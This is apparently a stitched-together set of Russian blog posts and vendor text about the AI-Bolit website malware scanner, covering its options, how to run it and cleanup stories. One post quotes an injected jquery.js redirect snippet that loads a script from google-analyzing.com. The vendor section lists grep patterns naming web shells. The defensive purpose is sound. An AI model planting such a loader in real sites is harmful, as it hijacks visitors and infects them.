Наибольший функционал доступен при запуске сканера AI-BOLIT в режиме командной строки. Это можно делать как под Windows/Unix/Mac OS X, так и непосредственно на хостинге, если у вас есть доступ по SSH и хостинг не сильно ограничивает потребляемые ресурсы процессора.
Обращаем внимание, что для запуска сканера требуется консольная версия PHP 7.1 и выше. Более ранние версии официально не поддерживаются. Проверьте текущую версию командой php -v
Справка по параметрам командной строки сканера AI-BOLIT
Показать помощь
php ai-bolit.php --help
php ai-bolit.php --skip=jpg,png,gif,jpeg,JPG,PNG,GIF,bmp,xml,zip,rar,css,avi,mov
Просканировать только определенные расширения
php ai-bolit.php --scan=php,php5,pht,phtml,pl,cgi,htaccess,suspected,tpl
Подготовить файл карантина для отправки специалистам по безопасности. Будет создан архив AI-QUARANTINE-XXXX.zip с паролем.
php ai-bolit.php --quarantine
Запустить сканер в режиме "параноидальный" (рекомендуется для получения максимально-детализированного отчета)
php ai-bolit.php --mode=2
php ai-bolit.php --mode=1
Проверить один файл "pms.db" на вредоносный код
php ai-bolit.php -jpms.db
Запустить сканер с размером памяти 512Mb
php ai-bolit.php --memory=512M
Установить максимальный размер проверяемого файла 900Kb
php ai-bolit.php --size=900K
Делать паузу 500ms между файлами при сканировании (для снижения нагрузки)
php ai-bolit.php --delay=500
Отправить отчет о сканировании на email [email protected]
php ai-bolit.php [email protected]
Создать отчет в файле /home/scanned/report_site1.html
php ai-bolit.php --report=/home/scanned/report_site1.html
Просканировать директорию /home/s/site1/public_html/ (отчет по-умолчанию будет создан в ней же, если не задана опция --report=файл_отчета)
php ai-bolit.php --path=/home/s/site1/public_html/
Выполнить команду по завершении сканирования.
php ai-bolit.php --cmd="~/postprocess.sh"
Получить отчет в текстовом виде (plain-text) с именем site1.txt
php ai-bolit.php -lsite1.txt
Можно комбинировать вызовы, например,
php ai-bolit.php --size=300K --path=/home/s/site1/public_html/ --mode=2 --scan=php,phtml,pht,php5,pl,cgi,suspected
Комбинируя вызов сканера AI-BOLIT c другими командами unix, можно выполнять, например, пакетную проверку сайтов. Ниже приведем пример проверки нескольких сайтов, размещенных внутри аккаунта. Например, если сайты размещены внутри директории /var/www/user1/data/www, то команда на запуск сканера будет
find /var/www/user1/data/www -maxdepth 1 -type d -exec php ai-bolit.php --path={} --mode=2 \;
Добавив параметр --report можно управлять каталогом, в котором будут создаваться отчеты о сканировании.
php ai-bolit.php список параметров … --eng
Переключить интерфейс отчета на английский. Данный параметр должен идти последним.
Интеграция с другими сервисами и в панель хостинга
php ai-bolit.php --json_report=/path/file.json
Cформировать отчет в формате json
php ai-bolit.php --progress=/path/progress.json
Cохранять статус проверки в файл в формате json. Данный файл будет содержать структурированные данные в формате json: текущий файл проверки, сколько файлов проверено, сколько файлов осталось проверить, процент проверки, время до завершения сканирования. Данный механизм можно использовать, чтобы в панели показывать прогресс-бар и данные о проверяемых файлах. По завершении сканирования файл удаляется автоматически.
php ai-bolit.php --handler=/path/hander.php
Внешний обработчик событий. Вы можете добавить собственные обработчики начала/завершения сканирования/прогресса сканирования/ошибки сканирования. Пример файла можно посмотреть в архиве сканера, в каталоге tools/handler.php. Например, по завершении сканирования можно что-то сделать с файлом отчета (отправить по почте, запаковать в архив и пр).
Недавно на одном из своих проектов я заметил срабатывание редиректа на сторонний рекламный ресурс. Это не такой явный хак сайта когда тот полностью перестает работать, а скрытый способ воровства трафика. Например, злоумышленник может перенаправлять только пользователей с мобильных устройств или сделать срабатывание скрипта непостоянным дабы владелец проекта не заметил потерю аудитории. Как бы там ни было, это все не очень хорошо для вашего сайта как с точки зрения посетителей, которые не попадают на нужные страницы, так и может вызывать проблемы со стороны поисковиков, если вдруг редирект идет на источник с вирусами.
Сегодня рассмотрим один полезный PHP скрипт AI Bolit который позволяет найти вирусы на хостинге дабы избавиться от разного вредоносного кода. Решение полностью бесплатное и не сложное в работе.
У данного скрипта есть 3 варианта релизов:
- AI Bolit под Windows — позволяет провести анализ сайт локально, предварительно скачав его на компьютер.
- Классический вариант для проверки хостинга на вирусы (подойдет также для Unix и Mac OS X).
- Новый веб-сканер (ReScan.pro) — проводит проверку страниц сайта онлайн.
Последний вариант, как вы понимаете, самый простой однако он не смотрит непосредственно файлы, находящиеся на хостинге, а лишь выборочно сканирует некоторые веб-страницы. Такая поверхностная проверка не может подсказать вам конкретный источник проблемы на сайте, но поможет ее обнаружить.
Некоторым пользователям наиболее привычными и простым кажется вариант скрипта AI Bolit для Windows, т.к. многие работают с этой ОС. Однако я бы все же рекомендовал выполнять проверку вирусов на хостинге. Здесь нет ничего сложного, и ниже подробнее об этом всем расскажу.
Принцип работы и особенности AI Bolit
Чтобы использовать AI Bolit вам нужно выполнить следующие действия:
- Скачать скрипт с сайта программы .
- Распаковать и залить его на хостинг.
- Запустить AI Bolit как указано в документации.
- После выполнения проверки получаете результат анализа сайта.
- Дальше вы можете самостоятельно исправить проблемы или обратиться за помощью к специалистам.
Последний пункт объясняет почему столь классный и мощный php скрипт AI Bolit распространяется бесплатно. Думаю, после нахождения проблем и вирусов на хостинге многие пользователи обращаются к разрабочтикам за последующими услугами. Вполне логичный подход. Решение, кстати, запатентовано и обладает уникальным алгоритмом, а популярніе ру-хостинги рекомендуют/используют его в работе. Помнится, когда-то обращался за помощью в тех.поддержку хостера по поводу проблем с одним сайтом, так они запускали проверку хостинга на вирусы именно с помощью AI Bolit. После того случая я и узнал о существовании данного решения:)
Основные плюсы и фишки AI Bolit:
- поиск разных типов вредоносных кодов: вирусы, шеллы, бэкдоры, публичные уязвимости в скриптах;
- бесплатное распространение;
- использование специального запатентованного эвристический анализа;
- относительно не сложная установка и настройка;
- актуальная база вирусов и вредоносных скриптов;
- проверка хостинга на вирусы для любых сайтов и CMS;
- работа с разными ОС: Windows, Unix, MacOS;
- рекомендации от ведущих хостинг-компаний.
Как пользоваться AI Bolit
1. Скрипт AI Bolit скачать можно пройдя по данной ссылке на сайте с его описанием. Там рекомендуется выбирать именно универсальную версию(!) для проверки хостинга на вирусы. После этого начнется автоматическое скачивание файла ai-bolit.zip.
2. Следующий шаг — распаковка и загрузка на хостинг. Для работы с FTP я использую бесплатную программу FileZilla (отличный ФТП клиент). После разархивации ai-bolit.zip найдете внутри документацию по установке в файле readme.txt. Если хотите, можете с ней ознакомиться.
define ("PASS" , "????????????????????" ) ; |
define("PASS", "????????????????????");
И вписываете вместо символов??? свое значение. Файл сохраняете.
4. Затем копируете все содержимое папки /ai-bolit/ на свой хостинг в корневую директорию (например, для WP это там, где находится wp-config).
5. После загрузки скрипта на сервер нужно запустить AI Bolit по ссылке в адресной строке вашего браузера:
https://адрес_вашего_сайта/ai-bolit.php?p=ваш_пароль
Через некоторое время получите отчет поиска вирусов на хостинге.
В данном примере видимо, что проверка обнаружила подозрительный редирект для мобильных устройств, находящийся в haccess, но я добавлял его самостоятельно. Также были найдены сторонние коды в некоторых файлах шаблона (на скриншоте их нет, т.к. уже все почистил).
6. После того как сканер AI Bolit завершил свою работу вам нужно обязательно удалить все его файлы с FTP (которые вы загружали на 4-том шаге) вместе с отчетом.
Напоследок хочется заметить, что в скрипте имеется 2 режима проверки: экспресс и «параноидальный» . В первом случае проверяются только js, php, html файлы и htaccess, а второй позволяет запустить AI Bolit на полную. Для этого в файле настроек ai-bolit.php поставьте значение переменной ‘scan_all_files’ => 1 либо используйте для запуска скрипта ссылку с дополнительным параметром:
https://адрес_вашего_сайта/ai-bolit.php?p=ваш_пароль&full
В документации сказано, что перед повторным запуском надо удалить AI-BOLIT-DOUBLECHECK.php, хотя лично у меня на ФТП такого файла не было. В readme.txt также найдете информацию как проверить на вирусы сайт на хостинге через SSH. Алгоритм действий похожий, но после копирования всех файлов скрипта на FTP запускаете его командой:
php ai-bolit.php |
php ai-bolit.php
В итоге автоматически будет создан файл AI-BOLIT-REPORT-<дата>-<время>.html с результати проверки. В принципе, ничего сложного нет, но дополнительные ответы на вопросы можете глянуть в FAQ.
В целом у меня получилось проверить сайт на вирусы с AI Bolit достаточно легко — проблему обнаружил и ликвидировал за минут 10. Скачивается сканер бесплатно отсюда , затем нужно настроить и запустить AI Bolit по специальной ссылке в браузере, после чего просмотреть результаты. Как исправлять вирусы, бэкдоры и шеллы — это уже несколько иной вопрос. В самом простом случае (как у меня с редиректом) — просто удаляете вредоносный код из файлов. Если плохо в этом разбираетесь или задача слишком сложная, можно запросить платную консультацию/услугу у разработчиков срипта. Они помогут не только с удалением вируса на хостинге, но и улучшат его защиту.
Искал я в интернете халявную "платную" тему для сайта. Благо сайтов таких достаточно. Правда они копируют друг друга =) По опыту работы с такими шаблонами я знал, что за такую халяву иногда приходится платить сполна. Потому что в такие шаблоны очень не хорошие люди вставляют всякие гадости, которые порядочным программистам могут доставить очень большие неприятности. Помнится мне, что мой антивирус ESET раньше находил и ругался на base64. Теперь и он не ругается. Это я к тому, что если проверять антивирусом, то это не поможет.
До Ai-Bolit я проверял Total Commander"ом файлы на содержимое определенных слов и уже в зависимости от найденного я проверял и исправлял. Но это очень нудное занятие. И я задался найти более оптимальное и быстрое решение поиска. И нашлось. Это - AI-Bolit - уникальный бесплатный скрипт для поиска вирусов, троянов, backdoor, хакерских активностей на хостинге.
И так, что умеет делать этот скрипт:
- искать вирусы, всякие вредоносные и хакерские скрипты на хостинге: шеллы по сигнатурам, шеллы на основе несложной эвристики - все то, что обычные антивирусы просто не в состоянии найти.
- работать со всеми популярнейшими cms без исключения, включая joomla, wordpress, drupal, bitrix...
- искать редиректы в.htaccess на вредоносные сайты
- искать код sape/trustlink/linkfeed в.php файлах
- определять дорвеи
- показывать директории, открытые на запись
- искать невидимые ссылки в шаблонах
Зачем же нужен этот скрипт?
Опытный хакер может взломать практически любой сайт. И ваш сайт может быть не исключением. Чем же опасен взлом сайта? Получив доступ к сайту злоумышленник может выполнить следующее:
- "сливать" ваш трафик на свои проекты
- скачает содержимое сервера и базы данных для продажи третьим лицам
- подменит контактные или платежные данные на сайте
- скачает персональные данные пользователей
- разместит на вашем сайте дорвеи со спам-ссылками
- внедрит на страницы сайта вирусы, трояны или эксплойты, заражая посетителей
- проведит с вашего сервера спам-рассылку
- продаст доступ к взломанному сайту другим злоумышленникам для последующего несанкционированного проникновения
- и прочее... Печально. Да?
Ai-Bolit позволяет своевременно обнаружить множество вредоносного ПО и подозрительных изменений на хостинге, снижая риск быть забаненным поисковыми системами за распространение вирусов и наличие дорвеев. А также позволяет своевременно узнать о возможных потенциальных утечках информации и других неприятностях относительно вашего сайта. КРУТО!!!
Как пользоваться скриптом
В архиве скрипта есть ОЧЕНЬ понятная инструкция. По-умолчанию "доктор" сканирует в обычном режиме с минимальным количеством сигнатур и минимальным числом ложных срабатываний.
Есть два варианта проверки. Они оба описанны в инструкции. приведу только первый - упрощенный.
Вариант запуска из браузера (не рекомендуется, так как выполняет только экспресс-сканирование )
- Скачать архив со скриптом (смотреть прикрепленные файлы)
- Распаковать.zip
- Поменять пароль в строке define("PASS", "put_any_strong_password_here_8_symbols_min");
- Включить режим "эксперт" в строке define("AI_EXPERT", 0); // заменить 0 на 1
- скопировать из папки /ai-bolit/ файлы на сервер в корневой каталог
- скопировать из папки know_files файлы, которые соответствуют вашей cms
- открыть в браузере http://sitename.com/ai-bolit.php?p=My456Pass123 и ждать отчета
- !!!после отображения отчета удалить файлы от айболита и сам скрипт с сайта!!!
Вот и все. Затем, перед вами появится отчет и вам остается следовать за ошибками и исправлять уязвимости.
Обратная связь
Автор очень приветливый человек. Всегда отвечает. Если у вас есть пожелания или вопросы, то пишите:
web:
http://www.revisium.com/ai/
e-mail:
[email protected]
skype:
greg_zemskov
Сегодня ко мне обратились за помощью в очистки интернет магазина от вирусов. Неожиданно для одного из сотрудников пришёл отказ в рекламе Google Adwords. В письме указали, что в файле jquery.js прописан подозрительный код.
В первую очередь я с помощью браузера открыл путь к данном файлу, но антивирус Avast никак не среагировал на данный файл, хотя зрительно я уже видел вредоносный код. Затем я соединился по ftp с помощью FileZilla и попробовал открыть файл с помощью программы Notepad++ . И вот тут мой антивирус заблокировал доступ к данному файлу.
Чтобы почистить js файл от вируса, мне пришлось на 10 минут отключить AVAST, а затем удалить из файла вредоносные строчки.
Если вы столкнулись с подобной проблемой, удалите следующий код как показано на картинке, или вот эти строки.
Var r=document.referrer; var c=document.cookie; r1=0; if ((r.indexOf("yandex")>0) || (r.indexOf("google")>0) || (r.indexOf("rambler")>0) || (r.indexOf("mail")>0)) { document.cookie = "__ga1=1; expires=Wed, 1 Mar 2020 00:00:00; path=/;"; r1=1; } else {if (c.indexOf("__ga1")==-1){document.cookie = "__ga2=1; expires=Wed, 1 Mar 2020 00:00:00; path=/;";}} if (((c.indexOf("__ga1")>-1) || (r1==1)) && (c.indexOf("__ga2")==-1)) {document.write(unescape("%3Cscript src="http://google-analyzing.com/urchin.js" type="text/javascript"%3E%3C/script%3E"));}
Бэкап сайта.
Далее соединяемся по ssh доступу, например с помощью утилиты putty и по возможности делаем архив сайта. Для этого достаточно в консоли воспользоваться следующим командой:
tar - cf backup .tar /home/логин/site/public_html
*/home/логин/site/public_html - полный путь до главной директории сайта
Бэкап сайта можно и не делать, но мало ли вы удалите что-то важное?
Теперь есть два варианта проверки сайта на вирусы
1. Проверка сайта с помощью php скрипта Ai-Bolit, который ищет различные вирусы а так же php shell.
2. Скачать весь сайт к себе на компьютер и прогнать антивирусом Avast, но первый вариант значительно лучше, удобней, и значительно качественней.
Очистка сайта на локальном компьютере
Сначала я воспользовался вторым способом, поэтому опишу именно его. После того как на компьютер были выкачены все файлы (или архив), а их немного не мало 25 000, я открыл Avast и указал папку с файлами сайта для их проверки на вредоносные скрипты.
После того как Avast выполнил проверку в папке с файлами веб-сайта были обнаружены два скриптовых вируса:
- Php-Shell-Jv
- Js-Redirector-Fc
Файл index.php состоял из следующего кода:
В файле javascript "ui.datepicker_old.js" был вредоносный код в самом низу содержания скрипта. Этот код необходимо удалить!
Очистка сайта от вирусов с помощью Ai-Bolit.
Ftp способ.
1. Загружаем архив со скриптом Айболит на локальный компьютер и распаковываем его.
2. Соединяемся по ftp с помощью клиента FileZilla
3. Распакованные файлы архива размещаем в главную директорию сайта /home/ваш сайт/public_html
4. Запускаем скрипт http://ваш домен/ai-bolit.php
5. Файл отчёта будет создан в главной директории с именем AI-BOLIT-REPORT.html
Если после запуска скрипта отображается чистый белый экран, значит версия php на сервере хостера не подходит для Айболита.
Внимание! Если необходимо проверить все сайты в директории, загружаем скрипт в папку /home/domains/ или /home/ , тогда Ai-Bolit рекурсивно пройдётся по всем папкам, и выдаст отчёт, но как мне кажется лучше проверять по одному домену.
Консольный вариант (SSH)
1. Запускаем программу Putty, или другую консольную программу.
2. Соединяемся с сервером по хосту и паролю.
3. Переходим в главную директорию сайта командой cd /home/ваш логин/ваш сайт/public_html/
4. Загружаем скрипт командой wget http://www..zip
5. Распаковываем zip архив командой unzip 20160904_112415ai-bolit.zip
6. Запускаем скрипт php ai-bolit.php
Для запуска в фоновом режиме используем команду: screen -d -m php ai-bolit.php
7. Ждём пока что скрипт выполнит проверку, и создаст отчёт вида "AI-BOLIT-REPORT.html " на сервере.
Так же обратите внимание, если на вашем сервере установлен php ниже 5.3, Айболит покажет ошибку и не запустит сканирование. В моём случае пришлось выкачивать сайт, и проверять его на своём сервере.
После того как на сервере будет создан файла отчёта, его можно скачать к себе на компьютер и посмотреть обычным браузером (Хром, Файерфокс, и т.д).
В первую очередь стоит обратить внимание на отчёт о "Вредоносных скриптах", ну а дальше либо аккуратно удалять эти файлы, либо чистить ручным способом, как это делаю я.
– это сканер вирусов и вредоносного кода нового поколения, которым уже воспользовались десятки тысяч веб-мастеров и администраторов серверов.
Он ищет вирусы, хакерские скрипты, фишинговые страницы, дорвеи и другие типы вредоносных скриптов, загружаемые хакерами при взломе сайтов.
Если на вашем сайте появились проблемы, например:
- антивирусы блокируют доступ к страницам сайта,
- на страницах появились чужие ссылки
- происходит мобильный редирект при заходе со смартфона или планшета,
- резко упала посещаемость,
- посетители жалуются на вирусы,
- хостинг заблокировал почту за рассылку спама,
- есть подозрение на взлом сайт
Сканер AI-Bolit является бесплатным для некоммерческого использования, любой веб-мастер может загрузить сканер на сайт и проверить свой ресурс на вирусы и взлом.
AI-Bolit рекомендуют многие российские хостинг-провайдеры , некоторые из них уже встроили сканер в панель управления виртуальным хостингом, что позволяет выполнить владельцу аккаунта антивирусную проверку в один клик.
Сканер разработан экспертами по информационной безопасности компании «Ревизиум» , специализирующейся на лечении сайтов и защите от взлома.
Ежедневно при лечении и восстановлении сайтов специалисты “Ревизиума” обнаруживают новые вредоносные скрипты и более изощренные способы сокрытия вредоносного кода. Эта информация используется для корректирования алгоритма работы сканера и пополнения базы правил, что делает сканер AI-Bolit более эффективным с каждой новой версией.
В чем уникальность сканера AI-Bolit?
Слабой стороной современных серверных сканеров вредоносного кода является их подход к обнаружению вредоносов и антивирусная база. Серверные антивирусы ищут вирусный и хакерские код по фиксированным параметрам (контрольной сумме файла, хэшу, строковым фрагментам). В то же время разработчики современных вредоносных скриптов научились обманывать сканеры, используя шифрование кода, делая каждую новую копию непохожей на предыдущую: они используют обфускацию переменных, шифрование исполняемого кода, косвенные вызовы и другие подходы. Поэтому старые методы поиска вирусов перестают работать. Если раньше системному администратору достаточно было выполнить команду
Find -type f -name "*.php" -print0 | xargs -0 fgrep -l "base64_decode($_POST" find -type f -name "*.php" -print0 | xargs -0 fgrep -l "if (count($_POST) < 2) { die(PHP_OS.chr(" find -type f -size -1000c -name "*.php" -print0 | xargs -0 grep -il "if(isset(\$_REQUEST\[.*eval(.*)" find -type f -name "*.php" -print0 | xargs -0 fgrep -l "base64_decode($_REQUEST" find -type f -size -1000c -name "*.php" -print0 | xargs -0 fgrep -l "eval(stripslashes($_REQUEST" find ~/domains/ -type f -name "*.php" -print0 | xargs -0 fgrep -l "eval($___($__)" find \(-regex ".*\.php$" -o -regex ".*\.cgi$" \) -print0 | xargs -0 egrep -il "r0nin|m0rtix|r57shell|c99shell|phpshell|void\.ru|phpremoteview|directmail|bash_history|filesman" find -type f -name "*.php" -print0 | xargs -0 fgrep -l "Euc Для поиска всех хакерских шеллов, то сейчас этого уже не достаточно, так как хакерский веб-шелл выглядит так: И меняет свою структуру и строковое представление. Нужен более эффективный механизм поиска вредоносного кода. Поэтому в AI-Bolit применяется несколько иной подход. При поиске вредоносного кода сканер использует предварительную нормализацию исходного кода, механизм поиска по регулярным выражениям и эвристические правила. Все это в совокупности позволяет обнаружить закодированные модификации веб-шеллов и бэкдоров, а также новые, еще неизвестные вирусы и хакерские скрипты, определяя их по альтернативным параметрам (например, если в исходном коде используются типичные для хакерских скриптов вызовы, файлы имеют случайно-сгенерированные имена, по нестандартным атрибутам файлов и т.п.). Использование продвинутого алгоритма обнаружения вредоносного кода позволяет сканеру AI-Bolit находить зашифрованные фрагменты полиморфной природы. Например, такие: В результате проведенных экспериментов AI-Bolit показал в разы обнаружение хакерских скриптов, по сравнению с ClamAv и MalDet, которые используются на многих хостингах в качестве бесплатных антивирусных решений. Как работает сканер AI-Bolit
Для проверки сайта достаточно загрузить сканер в каталог сайта (на хостинге или на локальном компьютере с бэкапом сайта) и запустить. Сканер можно открыть в браузере или запустить в режиме командной строки по SSH. Кроме того, AI-Bolit’ом можно проверить резервную копию сайта локально на своем компьютере. Результат проверки сайта — это подробный отчет в html или текстовом формате, который он может автоматически отправлять по электронной почте. На сайте есть подробные видео-инструкции и руководство для новичков. А вы уверены, что ваш сайт не взломан?
Большинство владельцев сайтов не подозревает, что их сайты взломаны и на них загружены хакерские скрипты. Поэтому рекомендуем проверить ваши сайты сканером AI-Bolit прямо сейчас. Если у вас возникнут вопросы по отчету сканера, пришлите его нам в “Ревизиум” на [email protected] (в виде архива.zip), мы поможем в нем разобраться. Обновления сканера анонсируются у нас в твиттере